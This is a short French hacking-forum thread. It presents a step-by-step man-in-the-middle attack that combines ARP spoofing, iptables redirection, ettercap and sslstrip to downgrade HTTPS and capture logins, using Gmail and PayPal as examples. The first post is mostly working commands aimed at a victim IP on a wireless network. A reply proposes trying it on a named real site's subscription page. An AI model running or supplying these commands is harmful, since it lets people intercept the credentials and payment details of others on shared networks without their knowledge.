Faille sites sans SSL

SAKAROV

Administrateur

Membre d'excellence

Inscription: juillet 2011

Messages: 3431
- Partager
- Tweet
#1

Faille sites sans SSL

08 août 2011, 04h41

Cette vidéo montre que sans le cryptage SSL, les sites ne sont pas sûrs.

Preuve de ce qui est perçu en présentant Google Mail et la banque en ligne PayPal.

Les outils :

> sslstrip
> arpspoof
> ettercap

Les commandes :

Code:

kate /etc/etter.conf >*uncomment redir_command_off in the iptables, linux section* echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1

Code:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ettercap -T -q -i wlan0

Code:

sslstrip -a -k -f ettercap -T -q -i wlan0

Le tutoriel en vidéo :

Stripping SSL & Sniffing HTTPS (SSLStrip)

sigpic

Cyprium Download Link

Plus j'étudie plus j'me rends compte que je n'sais rien.

†|
Tags: faille, script, ssl
Mantra

Hackadémicien

Membre impliqué

Inscription: août 2011

Messages: 276
- Partager
- Tweet
#2

04 septembre 2011, 19h09

Il y aurait bien un site a tester ...
Pornhub lors de l’abonnement je crois qu'ils sont pas sous ssh .

" Une teuf sans drogue c'est comme une levrette sans fessé, c'est quand même rare. "

†|
Commentaire

Annonce